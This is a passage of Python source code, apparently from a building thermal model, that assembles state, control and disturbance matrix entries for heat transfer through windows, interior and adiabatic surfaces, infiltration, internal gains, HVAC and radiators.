'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
)
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_window_sky']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
def define_heat_transfer_surfaces_interior():
"""Thermal model: Interior surfaces"""
for surface_name, surface_data in building_data.surfaces_interior.iterrows():
for zone_name in [surface_data.at['zone_name'], surface_data.at['zone_adjacent_name']]:
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Conductive heat transfer from the interior towards the core of surface
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{zone_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1))
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{surface_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
else: # Surfaces with neglected heat capacity
# Get adjacent / opposite zone_name
if zone_name == surface_data.at['zone_name']:
zone_adjacent_name = surface_data.at['zone_adjacent_name']
else:
zone_adjacent_name = surface_data.at['zone_name']
# Total adjacent zone surface area for calculating share of interior (indirect) irradiation.
zone_adjacent_surface_area = sum(
zone_surface_data.at['surface_area']
* (1 - zone_surface_data.at['window_wall_ratio'])
for zone_surface_name, zone_surface_data in pd.concat(
[
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_adjacent_name'] == zone_adjacent_name
],
building_data.surfaces_adiabatic[
building_data.surfaces_adiabatic['zone_name'] == zone_adjacent_name
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone
)
# Complete convective heat transfer from adjacent zone to zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_adjacent_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
zone_adjacent_name + '_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1))
/ building_data.zones.at[zone_name, 'heat_capacity']
)
# Windows for each interior surface - Modelled as surfaces with neglected heat capacity
if surface_data.at['window_wall_ratio'] != 0.0:
# Get adjacent / opposite zone_name
if zone_name == surface_data.at['zone_name']:
zone_adjacent_name = surface_data.at['zone_adjacent_name']
else:
zone_adjacent_name = surface_data.at['zone_name']
# Total adjacent zone surface area for calculating share of interior (indirect) irradiation
zone_adjacent_surface_area = sum(
zone_surface_data.at['surface_area']
* (1 - zone_surface_data.at['window_wall_ratio'])
for zone_surface_name, zone_surface_data in pd.concat(
[
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_adjacent_name'] == zone_adjacent_name
],
building_data.surfaces_adiabatic[
building_data.surfaces_adiabatic['zone_name'] == zone_adjacent_name
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone
)
# Complete convective heat transfer from adjacent zone to zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_adjacent_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
zone_adjacent_name + '_temperature'
] += (
surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (1.0 - (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1))
/ building_data.zones.at[zone_name, 'heat_capacity']
)
def define_heat_transfer_surfaces_adiabatic():
"""Thermal model: Adiabatic surfaces"""
for surface_name, surface_data in building_data.surfaces_adiabatic.iterrows():
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Conductive heat transfer from the interior towards the core of surface
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
f'{surface_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
else: # Surfaces with neglected heat capacity
logger.warning(f"Adiabatic surfaces with zero heat capacity have no effect: {surface_name}")
def define_heat_transfer_infiltration():
for zone_name, zone_data in building_data.zones.iterrows():
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* zone_data.at['zone_volume']
* building_data.parameters.at['heat_capacity_air']
/ zone_data.at['heat_capacity']
)
disturbance_matrix[
f'{zone_name}_temperature',
'ambient_air_temperature'
] += (
zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* zone_data.at['zone_volume']
* building_data.parameters.at['heat_capacity_air']
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_internal_gains():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['internal_gain_type']):
disturbance_matrix[
f'{zone_name}_temperature',
zone_data.at['internal_gain_type'] + '_internal_gain_occupancy'
] += (
zone_data.at['occupancy_density']
* zone_data.at['occupancy_heat_gain']
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
disturbance_matrix[
f'{zone_name}_temperature',
zone_data.at['internal_gain_type'] + '_internal_gain_appliances'
] += (
zone_data.at['appliances_heat_gain']
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_generic():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_generic_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_generic_heat_thermal_power'
] += (
1.0
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_generic_cool_thermal_power'
] += (
- 1.0
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_radiator():
"""Define state equations describing the heat transfer occurring due to radiators."""
if pd.notnull(building_data.zones['hvac_radiator_type']).any():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_radiator_type']):
# Thermal power input to water.
control_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_thermal_power'
] += (
1.0
* zone_data.at['zone_area']
/ zone_data.at['heat_capacitance_water']
)
# Heat transfer between radiator hull front and water.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
if zone_data.at['radiator_panel_number'] == '2':
# Heat transfer between radiator panel 1 hull rear and water.
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
# Heat transfer between radiator panel 2 hull front and water.
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
# Heat transfer between radiator hull rear and water.
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
# Heat transfer between radiator hull front and zone air.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_zone']
/ zone_data.at['heat_capacity']
)
if zone_data.at['radiator_panel_number'] == '2':
# Heat transfer between radiator panel 1 hull rear and zone air.
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_1_rear_zone']
/ zone_data.at['heat_capacity']
)
# Heat transfer between radiator panel 2 hull front and zone air.
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_panel_2_front_zone']
/ zone_data.at['heat_capacity']
)
# Heat transfer between radiator hull rear and zone air.
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_zone']
/ zone_data.at['heat_capacity']
)
# Heat transfer between radiator hull front / rear and zone surfaces.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
/ zone_data.at['heat_capacitance_hull']
)
for surface_name, surface_data in (
pd.concat(
[
building_data.surfaces_exterior.loc[
building_data.surfaces_exterior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_adjacent_name'].isin([zone_name]),
:
],
